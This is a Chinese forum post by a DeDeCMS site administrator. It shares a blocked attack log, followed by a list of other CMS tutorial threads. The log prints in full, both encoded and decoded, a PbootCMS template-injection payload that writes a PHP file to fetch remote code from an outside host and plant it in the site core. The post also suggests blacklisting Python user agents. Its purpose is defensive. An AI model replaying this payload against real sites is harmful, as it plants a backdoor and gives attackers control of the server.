Python玩得好,但那又怎么样呢
By snh102 at 2024-07-18 • 暂不可见爬虫?抓包?渗透?挂码?提权?可刑,可铐,牢玩家,Python学得好,牢饭吃到饱。下面,分享一条,黑科技日志。黑科技真多,黑科技来了,这些黑科技真的来了?
黑科技日志
时间 2024/07/18 09:27:15
用户IP 143.92.32.133
类型 args
过滤器 args
URI地址:/{pboot:if(("file_put_co"."ntents")("temp.php",("base6"."4_decode")("PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCcuL2NvcmUvYmFzaWMvZnVuLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9kLnNvZ291YWQudmlwL3R4dC9tYTEudHh0JykpOwplY2hvICd0ZW1wMTExODg4JzsKdW5saW5rKF9fRklMRV9fKTs=")))}{/pboot:if}/../../?p=1User-Agent Python-urllib/3.10
过滤规则 《疑似误拦截提交入口》非浏览器请求已被系统拦截,如想关闭此功能如下操作:Nginx防火墙--全局设置--非浏览器拦截
传入值 空
风险值 空
封锁原因 多次恶意请求
封锁时长 86400秒
状态 封锁中
URI地址解密后
args /{pboot:if(("file_put_co"."ntents")("temp.php",("base6"."4_decode")("<?php file_put_contents('./core/basic/fun.php',file_get_contents('http://d.sogouad.vip/txt/ma1.txt'));echo 'temp111888';unlink(__FILE__);")))}{/pboot:if}/../../?p=1 HTTP/1.1
host:nidecms.com
connection:close
user-agent:Python-urllib/3.10
accept-encoding:identityIP归属地:还是服务器啊
归属地:中国香港
运营商:CTG Server Limited
IPV4:143.92.32.133
这年头,黑科技真多,个个都是人才。会用黑科技的是人才,教人玩黑科技的也是人才。
防范于未然
宝塔-防火墙-全局配置-UA黑名单 添加 Python 就好了。
兄弟,你路走歪了,别人学习编程,都是用于开发。你拿渗透当娱乐,不让你笑,你都不知道我文武双全。
目前,正在制作直接封IP代码。URI地址样本正在取样中,预期将在下周内可完成,就等你的黑科技日志啦!
登录后方可回帖
百度秒收录:DeDeBIZ得德一键生成网站地图插件
想实现百度秒收录,除了主动推送、添加网站地图外,还有个方法是这个织梦教程。 在 DeDeCMS 织梦系统中,有一键生成网站地图插件。移植到 DeDeBIZ 系统中即可。 插件下载 本地下载 解压后,得到 admin 和 ...
snh102 • 2024-09-08 DeDeBIZ会员登陆不了的解决办法
在博客写过: DeDeBIZ登录成功后,又返回登录界面的解决办法。 DeDeBIZ历史版本下载。 就是将 v6.2.12 版的 /system/helpers/cookie.helper.php 文件与新版 V6.3.0 文件直接覆盖。 OK了,文件替换,问题解决。你再登录,就...
snh102 • 21 天前 DeDeBIZ织梦动态TAG标签改成拼音伪静态的方法
DeDeBIZ有生成静态TAG标签功能,默认却是动态+ID链接版,生成后还有N个目录版。 在上一篇《 DeDeBIZ/DeDeV6:TAG标签改为拼音ID静态版 》DeDeV6织梦教程中,我将DeDeBIZ的TAG标签改为拼音ID静态版。但是,有站长说,...
snh102 • 2024-07-17 • 最后回复来自 snh102 织梦栏目导航菜单一级二级三级带高亮调用标签大全
织梦仿站的时候,都会用到 channelartlist 和 channel 的导航菜单,一级、二级、三级带高亮的调用标签大全,具体实现方法如下。 type:son表示下级栏目type:self表示同级栏目type:top顶级栏目noself=yes表示不调用同级。...
snh102 • 23 天前 DedeBIZ更新标签时,取消TAG标签会自动加点击量的方法
DedeBIZ系统呀,虽然TAG标签是静态的,但是每次生成更新标签时,每个TAG标签都会自动加1点击量。经测试,确实,完美+1,是BUG啊!绝对是BUG了!下面附上修复方法。 打开 /system/archive/taglist.class.php 搜索 if($...
snh102 • 2024-04-29 织梦程序Cookie名称的修改方法
织梦网站,TA有四个Cookie名称,分别是:DedeLoginTime、DedeLoginTime__ckMd5、DedeUserID、DedeUserID__ckMd5等。这是织梦程序特征的象征,无论你有没有使用会员中心,按F12审核元素在控制台就能看到这四个Cookie名称,下...
snh102 • 2024-06-29 DedeCMS织梦模板的正确使用方法
织梦网站老被黑,我怀疑,是DedeCMS织梦模板的问题,或者是你搭建的方式不对。你看我的网站,同样是织梦站,也没见TA被黑啊!下面,附上织梦模板的正确使用方法。 一、用D盾扫描 织梦模板,拿到后的第...
snh102 • 9 天前 • 最后回复来自 snh102 DeDeBIZ自定义表单添加用户UA信息
想防止表单被刷, 限制IP 不行, 加验证码 不行, 限制省份 不行,限制次数也不行。IPV4换IPV6啊,那就再整个新的,添加用户UA信息,把恶意UA加入黑名单。 教程开始 1、给表单添加浏览器UA信息。 登录后台...
snh102 • 30 天前 DeDeBIZ/DeDeV6:TAG标签改为英文ID静态版
DeDeBIZ官网群,天天有人嫌弃TAG标签,一个好的织梦内容管理系统,不能因为一个TAG标签功能影响生态。为了满足织梦群友的共同需求,小编决定把TAG标签给优化了。 未修改之前:/a/tags/1/1/index.html 修改好之后...
snh102 • 2024-07-11 • 最后回复来自 snh103 DeDeBIZ的外部栏目无法调用的解决办法
有群友说,DeDeBIZ又有BUG君了!channelartlist 无法调用外部栏目。 经检查,被 ispart2 不等于2给过滤了,外部栏目的值就是2啊!下面修复教程附上 教程开始 打开 /system/taglib/channelartlist.lib.php 搜索 ANDispart2AND 改为...
snh102 • 7 天前
织梦首页自动更新的实现方法
织梦网站实现每天自动更新首页,实现DeDeCMS织梦首页自动更新的方法。把织梦玩透了,像这种问题,完全没什么难度,而且还超级简单。 一、在根目录新建一个 index123.php 文件,代码如下 ?phprequire_once(dirna...
从白走到黑 • 2024-03-12 • 最后回复来自 从白走到黑 DeDeBIZ定时随机间隔发布TXT文档教程
懒人,总能有办法,懒出新高度。DeDeBIZ发布文章也是一样,使用发布TXT文档软件,和挂火车头发布有和区别,而且那个火车头是免费的,这间隔发布TXT文档软件是收费的。多开一个软件都费电、费事不说,居...
snh102 • 2024-03-18 • 最后回复来自 snh102 DeDeBIZ每日投稿数量限制的方法
织梦限制会员每天投稿数量的方法。在织梦BIZ中,会员投稿,只能永久投稿1篇。确实少了,下面,教大家修改,限制会员投稿每日能投稿10篇的方法。 一、先开启开发模式,织梦BIZ不太人性化,想改点东西,...
snh102 • 2024-04-27 DeDeV6手机端插件免安装版
我用《 DedeBIZ织梦管理系统-免商业授权企业级免费CMS建站程序 》开心版。 DeDeBIZ新版真麻烦,直接升级报错不说,DeDeCMSV6手机端插件不能用,原来的DeDeBIZ手机端插件,修改下还是阔以使用的,下面附上源码以...
snh102 • 2024-07-10 织梦开发一键更新文档HTML添加继续未完成任务
织梦后台全站更新链接重置的解决办法。搞织梦采集站的小伙伴,文档一般都已十万来继续的,而文档更新会出现经常掉线。 时不时的就会出现无法响应、链接超时、链接重置等。 《 宝塔挂机自动更新教程...
snh102 • 24 天前 DeDeBIZ一键式切换安全调试模式
和《 DeDeBIZ一键式切换安全开发模式 》不一样,安全模式,开发模式,只是后台一些功能的限制,默认它是开启安全模式的。 而这个开发调试模式,开启后,是会有一些php的报错信息提示,这样就可以知道是...
snh102 • 2024-07-24 织梦管理员帐号不允许从前台登录
织梦不允许管理员账户前台登陆的解决方法。 如果你用的是 DeDeCMS 程序,打开 /include/memberlogin.class.php 搜索 如果你用的是 DeDeBIZ 程序,打开 /system/memberlogin.class.php 搜索 管理员帐号不允许从前台登录 然后看到...
snh102 • 2024-05-18 新增仅自己查看和管理员查看功能
这是一篇演示文章,测试本站新增的功能,仅自己查看和管理员查看功能! 我听说呀!提高了DedeCMS的安全性,建议所有官方原版程序搭建的站点都进行安装! 第一段:登录后查看 该部分是隐藏区 这里登录...
snh102 • 25 天前 DeDeBIZ织梦安装UEditorPlus百度编辑器
UEditor Plus 是基于 UEditor 二次开发的富文本编辑器。 昨天发现的,百度编辑器大有可玩。织梦BIZ的《 DeDeBIZ织梦安装UEditor百度编辑器 》我都是用这个。既然发现了,肯定是需要更新的哈! 演示效果图 和官网...
snh102 • 2024-07-14 DeDeCMS织梦安装UEditorPlus百度编辑器
UEditor Plus 是基于 UEditor 二次开发的富文本编辑器。 织梦CMS的《 织梦编辑器换为百度编辑器的教程 》又可以更新啦! 参考:安装教程看《 DeDeBIZ织梦安装UEditorPlus百度编辑器 》 下载后,只需打开 /ueditor-plu...
snh102 • 2024-07-14
Python很厉害?Go很厉害?但那又怎么样呢。
这两种User-Agent啊,绝对是扫网站漏洞的。
你看,你看,你细看。你品,你品,你细品。